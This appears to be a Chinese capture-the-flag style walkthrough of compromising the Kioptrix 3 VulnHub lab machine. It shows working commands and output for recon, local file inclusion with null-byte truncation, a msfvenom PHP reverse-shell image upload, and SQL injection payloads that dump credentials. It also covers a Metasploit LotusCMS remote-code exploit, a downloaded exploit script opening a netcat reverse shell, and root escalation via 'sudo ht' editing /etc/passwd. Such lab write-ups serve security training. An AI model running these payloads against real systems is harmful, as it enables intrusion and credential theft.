信息收集

同样用netdiscover发现目标主机。

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# netdiscover 

 Currently scanning: 192.168.194.0/16   |   Screen View: Unique Hosts          
                                                                               
 13 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 780              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      6     360  Xiaomi Communications Co Ltd
 192.168.43.33   44:03:2c:68:d8:0f      2     120  Intel Corporate             
 192.168.43.58   00:0c:29:b2:76:40      4     240  VMware, Inc.                
 192.168.43.158  00:0c:29:38:2d:6f      1      60  VMware, Inc.

目标IP为192.168.43.158

用nmap扫描目标主机端口信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

由扫描信息可以得到

  • 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
  • 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
  • OS details: Linux 2.6.9 - 2.6.33

80端口可以看出cms为Lotus CMS

dirb扫描一下网站目录。也可以用御剑扫描目录。发现存在phpdamin

cms后台http://192.168.43.158/index.php?system=Admin

漏洞利用

文件包含&后台上传

访问80端口上的WEB服务。

发现url中有点问题

http://192.168.43.158/index.php?system=Blog

尝试system=../../../../../etc/passwd

好像不行,尝试%00.截断,发现可以读到/etc/passwd

http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.

这里可以结合后面SQLmap跑出来的后台密码得到了一个shell。

1
2
3
4
5
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

msfvenom生成一个图片马

我们在后台上传图片的地方上传一个图片

修改已有的图片,并得到图片的名,

利用msf监听端口

利用文件包含,包含上传图片,这个地方比较鸡肋。因为这个绝对路径我们是得不到的。

1
http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.

访问返回一个shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.43.177:443 
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400

meterpreter > ls
Listing: /home/www/kioptrix3.com
================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 09:21:17 -0400  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  core
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  data
100644/rw-r--r--  23126  fil   2011-04-14 12:23:13 -0400  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 11:32:31 -0400  gallery
100644/rw-r--r--  26430  fil   2011-04-14 12:23:13 -0400  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 12:23:13 -0400  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  style
100644/rw-r--r--  243    fil   2011-04-14 12:23:13 -0400  update.php

权限有点小,很多命令都执行不了的。

SQLmap进行SQL注入

这个站是有的链接有问题,302跳转到kioptrix3.com

etc/passwd添加

1
192.168.43.158  kioptrix3.com

service networking restart重启服务

发现url存在SQL注入。kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos

先用sqlmap进行注入测试,id存在报错注入。

尝试查找下后台管理员账号密码。

1
2
3
4
5
6
7
8
9
Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

得到管理员账号密码,但是在

无法登录,另外找到一个登录的地方http://kioptrix3.com/gallery/gadmin/

1
2
3
4
5
6
7
8
Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin    | n0t7t1k4 |
+----------+----------+

但是可以登录。

这里虽然可以是rootdba权限,但是没有绝对路径。不能直接用sqlmap进行写shell。

手注sqli

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#

判断一共有6列

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#

得到当前数据库和版本号

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#

得到当前数据库所有的表名。

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#

获取表里的列名。

1
http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#

Lotus CMS 漏洞

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion           | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities              | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

从查询结果看,有一个本地文件包含和一个远程代码执行,

这里的本地文件包含就是我们之前发现的那个。我们尝试下这个本地文件包含漏洞

尝试发现这个漏洞好像不行。

尝试LotusCMS 3.0 - 'eval()' Remote Command Execution 发现是一个rb文件。

于是

1
2
3
4
5
6
7
8
msf > search LotusCMS

Matching Modules
================

   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution

利用这个漏洞进行攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options 

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp 
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options 

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host


Payload options (generic/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(multi/http/lcms_php_exec) > run 

[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run 

[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400

whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd 
/home/www/kioptrix3.com

我尝试用cd命令进入gallery目录但是不行,

这里用到ls -l可以看到gallery目录的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

发现gconfig.php配置文件,cat读配置文件。

1
2
3
4
5
6
7

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

lotusRCE.sh

1
wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158

Path found, now to check for vuln....

</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333

OK, open your local listener and choose the method for back connect: 
1) NetCat -e	    3) NetCat Backpipe	5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
1
2
3
4
5
6
7
root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

尝试用之前SQL注入得到的。

1
2
3
4
5
6
7
8
9
Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

进行SSH连接,发现第一个账号不能没有多大的作用,不能提权。

连接第二个账号

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README

存在一个CompanyPolicy.README文件.

1
2
3
4
5
6
7
8
9
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO

英语比较垃圾,百度翻译的意思是可以通过sudo ht对文件进行编辑,创建。

在kali下尝试

1
2
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

报错不能打开一个xterm-256color.终端。

回到本地环境用xshell连接是可以打开的

此时按F3,可以输入/etc/passwd或者/etc/sudoers文件来进行文件编辑

把/etc/passwd当前用户的权限修改和root一样即可。

也可以把/etc/sudoers当前用户的权限修改和root一样即可。

重新登录SSH。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May  8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root

此时已经是root权限了。

总结

这次实验过程挺长的,发现了很多地方的问题,第一是发现了phpmyadmin我尝试用写日志的方法试试能不能拿到shell。但是发现phpmyadmin变量了不存在general log变量。

另外就是这里有个SQL注入,可以用sqlmap跑出来,是root权限。尝试用os-shell写shell。通过了之前用远程命令执行得到的绝对路径,但是还是无法写入。好像是目录权限的问题。

phpmyadmin下也无法执行INTO OUTFILE函数。显示#1 - Can't create/write to file。从在命令执行里也看得出来目录是没有权限的。

在最后补充了一个文件包含和后台上传的利用,这个组合通过文件包含执行图片木马,得到一个shell。虽然说很鸡肋,还是感觉有点厉害的。

在实验过程中还是想多多尝试多种方法的,但是实验环境还是有限。但在这次实验中还是学到了很多,做了几次vulnhub的实验了,感觉提权方面还是有学习到很多。

虽然说这些环境有点不常见甚至奇葩,但是还是在这个过程中学到了linux环境下的一些之前一直匮乏的知识。